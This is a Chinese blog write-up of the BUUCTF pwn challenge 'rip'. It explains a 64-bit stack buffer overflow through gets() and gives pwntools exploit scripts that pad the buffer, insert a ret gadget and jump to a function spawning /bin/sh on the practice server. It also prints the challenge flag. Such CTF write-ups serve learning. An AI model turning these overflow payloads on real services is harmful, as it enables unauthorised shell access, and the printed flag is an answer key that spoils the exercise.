BUU-rip

最新推荐文章于 2023-07-13 11:41:11 发布
最新推荐文章于 2023-07-13 11:41:11 发布
阅读量670 收藏
点赞数
分类专栏: Pwn-WP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45771413/article/details/116211156
版权

查看保护

在这里插入图片描述

IDA分析

看到gets函数,这里没有输入长度限制,输入的s为16位

在这里插入图片描述

接下来找有没有敏感权限:

shift+f12 找到了 /bin/sh,打开发现其地址在401186

Tips:这里包含了system指令,若不包含还得找到system地址,payload(填充字符串+填充rbp地址+system地址+/bin/sh地址)

在这里插入图片描述

尝试写exp

运行后报错:Got EOF while reading in interactive

from pwn import *
p = remote('node3.buuoj.cn',28406)
p.send('a'*16+'A'*8+p64(0x401186))
p.interactive()

本体文件是64位的,参数小于6个不会用到栈来传参

而gets()只有一个参数,根据main的汇编代码,可以发现传递参数只需用到rdi (s字符串传入的是rdi寄存器的值)

在这里插入图片描述

本题的s空间为15,15+8可以覆盖rbp。

后面本应直接接 /bin/sh 的地址,但是报错

查阅资料后发现需要再 /bin/sh前添加一个任意一个retn地址(retn=pop + 地址),作pop执行

在这里插入图片描述

于是我随便找了一个retn地址:0x401185。

EXP

from pwn import *
p = remote('node3.buuoj.cn',26782)
p.send('a'*15+'A'*8+ p64(0x401185)+p64(0x401186))
p.interactive()

flag

flag{e44e7fe7-e52c-4a8e-913a-f00ebc57591c}

Holy-Pang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buu rip1
weixin_42238862的博客
10-02 1万+
文章目录前言一、看看程序有没有保护二、对程序源码进行分析1.判断溢出点2.手动测试溢出字符长度3.EXP总结 前言 本人刚刚入坑二进制不久,因为以前主玩渗透测试,所以喜欢学习理论的同时,做一些实战的题目,这不就在BUU上看到了一道pwn的入门题RIP1,但是这个题也让我知道二进制的门槛不是一般的高,第一次写文章,大佬勿喷! 一、看看程序有没有保护 常规操作,查看程序的位数以及各种保护机制!可以看到程序是linux下的程序为64位,并且没有开启任何保护 二、对程序源码进行分析 1.判断溢出点 把程序拖进
BUU杂项
qi_SJQ_的博客
10-31 361
ps:重点不在解题/写writeup而在于吸收/记住题背后的知识点。 1.[SWPU2019]我有一只马里奥: NTFS流隐藏文件,(1)直接cmd中解密 (2)工具: 知识点:NTFS流隐写(https://www.cnblogs.com/Chesky/p/ALTERNATE_DATA_STREAMS.html) (https://blog.csdn.net/qq_45836474/article/details/111074356) 2.BUU [谁赢了比赛?]: 刚看照片以为是将黑棋白棋当成0,
带exp的pwn测试文件
09-12
带exp的pwn测试文件、ret2text、ret2syscall、ret2shellcode、ret2libc、ret2csu、stack_pivoting、stack_smash
Pwntools遇到Got EOF while reading in interactive【未完全解决】
热门推荐
qq_43596950的博客
02-18 1万+
我没有解决这个bug,但我想提供一种思路 pwn初学者,写缓冲区溢出时拿shell遇到了Got EOF while reading in interactive。 1、更换system函数 程序源代码: #include<stdio.h> #include<unistd.h> #include<stdlib.h> #include<string.h> void exploit(){ //system("/bin/sh"); //使用syst
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4939
BUU CTF PWN 入门知识详解
BUU刷题-Pwn-rip
一个啥也不会的小菜鸡!
07-13 271
因为此题出的比较草率,没有考虑关闭缓冲区,please input加入缓冲区之后并没有满,因此继续留在缓冲区即程序并没有输出出来,所以根本就收不到这字符串,自然就会超时。有后门函数,利用栈溢出(思路没问题,但是远程的环境有问题)里面有详细解释,涉及到[[堆栈平衡]]
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
joinUs-buu2018:h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信qq分享
05-02
joinUs-buu2018 h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信/qq分享 #预览地址
apachecn#apachecn-ctf-wiki#[WP/BUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
Project-Decoder-Ring
03-27
项目解码器环 项目描述:解码器环 该应用程序具有3种不同的解码器。 1.凯撒密码是一种替换密码,其中明文中... 2.... 3.... “单位”可以是单个字母(最常见),成对的字母,字母的三元组,上述的混合形式,等等。... 屏幕截图:
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
蒸米一步一步学ROP复现失败出现Got EOF while reading in interactive
温和的跳跃
02-05 1875
可以看看自己pwn和python还有构造的payloads是不是版本不一致 我自己的是因为安装的是python3版本的pwn然后复现错误。建议python2 python2版本的pwntools 原文payloads都是python2 一切的时间刚刚好
Got EOF while reading in interactive
weixin_52296042的博客
10-01 1564
你做错了
buu rip
qq_45691294的博客
12-10 1977
连接上题目环境后,发现可以输入字符,然后得到返回 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 用IDA分析程序,发现主函数和一个名为fun的子函数 先看main函数的汇编代码和伪代码 get很明显没有限制输入,那么就存在溢出的漏洞,在字符串表中又发现了/bin/sh的字符,在fun函数中用了system函数进入到/bin/sh,那么就可以通过将fun函数的地址覆盖到返回地址就可以实现溢出获得系统权限 双击s查看输入点在栈的位置,发现只需存入15个字节即可劫持函数返回地址,因此
guess_num [XCTF-PWN]CTF writeup系列8
重新启程
12-20 1571
题目地址:guess_num 先看看题目情况 照例下载附件,做保护机制检查 root@mypwn:/ctf/work/python# checksec d22084e1938f4b21a380e38e2fb48629 [*] '/ctf/work/python/d22084e1938f4b21a380e38e2fb48629' Arch: amd64-64-littl...
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。 在解密Quoted-printable编码时,我们可以使用在线工具来帮助我们。一个可以使用的工具是[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。 根据提供的信息,得到的flag是"flag{那你也很棒哦}"。 总结:Quoted-printable是一种常见的邮件编码方法,用于将非ASCII字符转换为可打印的ASCII字符。解密Quoted-printable编码可以使用在线工具,如[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。根据提供的信息,得到的flag是"flag{那你也很棒哦}"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值